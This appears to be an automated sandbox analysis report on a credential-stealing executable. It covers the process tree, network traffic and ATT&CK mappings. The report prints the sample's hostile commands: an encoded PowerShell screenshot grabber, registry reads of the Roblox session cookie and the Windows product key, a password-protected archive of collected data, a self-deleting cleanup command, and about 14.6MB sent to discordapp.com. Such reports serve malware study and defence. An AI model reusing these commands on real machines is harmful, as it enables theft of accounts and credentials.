  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4272
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnknajh\flnknajh.cmdline"
        5⤵
        
        PID:3112
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7C7.tmp" "c:\Users\Admin\AppData\Local\Temp\flnknajh\CSC7ECB57C46FCB475C897ED6FFE97C8EE.TMP"
        6⤵
        
        PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:968
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1528
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2856
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1720
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2828
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49002\rar.exe a -r -hp"1018" "C:\Users\Admin\AppData\Local\Temp\bHyKx.zip" *"
    3⤵
    PID:3608
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49002\rar.exe a -r -hp"1018" "C:\Users\Admin\AppData\Local\Temp\bHyKx.zip" *
      4⤵
      Executes dropped EXE
      PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4632
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4548

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

blank-pegpz.in

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

8.8.8.8:53

Request

blank-pegpz.in

IN A

Response
DNS

21.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.49.80.91.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3

Response

HTTP/1.1 200 OK

Date: Sun, 22 Dec 2024 12:10:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

gstatic.com

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.74.227
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

227.74.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.74.250.142.in-addr.arpa

IN PTR

Response

227.74.250.142.in-addr.arpa

IN PTR

par10s40-in-f31e100net
GET

http://ip-api.com/json/?fields=225545

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3

Response

HTTP/1.1 200 OK

Date: Sun, 22 Dec 2024 12:10:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discordapp.com

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Remote address:

8.8.8.8:53

Request

discordapp.com

IN A

Response

discordapp.com

IN A

162.159.130.233

discordapp.com

IN A

162.159.129.233

discordapp.com

IN A

162.159.135.233

discordapp.com

IN A

162.159.133.233

discordapp.com

IN A

162.159.134.233
DNS

233.130.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.130.159.162.in-addr.arpa

IN PTR

Response
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

181.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

181.129.81.91.in-addr.arpa

IN PTR

Response
DNS

22.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.49.80.91.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response

208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

347 B
307 B
5
3

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
142.250.74.227:443

gstatic.com

tls

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

1.1kB
5.3kB
9
9
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

392 B
592 B
6
6

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.130.233:443

discordapp.com

tls

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

14.6MB
193.2kB
10612
4646

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

blank-pegpz.in

dns

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

60 B
113 B
1
1

DNS Request

blank-pegpz.in
8.8.8.8:53

21.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

21.49.80.91.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

gstatic.com

dns

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.74.227
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

227.74.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

227.74.250.142.in-addr.arpa
8.8.8.8:53

discordapp.com

dns

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

60 B
140 B
1
1

DNS Request

discordapp.com

DNS Response

162.159.130.233

162.159.129.233

162.159.135.233

162.159.133.233

162.159.134.233
8.8.8.8:53

233.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.130.159.162.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

181.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

181.129.81.91.in-addr.arpa
8.8.8.8:53

22.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

22.49.80.91.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b7f97ee2bb5ef7400cbda2017f941e0c

SHA1
5007f1ae8221edaa5d5c8a9656f397638f4f3aa5

SHA256
4a04a07b41860bd8c5170a6927ba06a84cdebfe3a883bb2c1678c764ec827565

SHA512
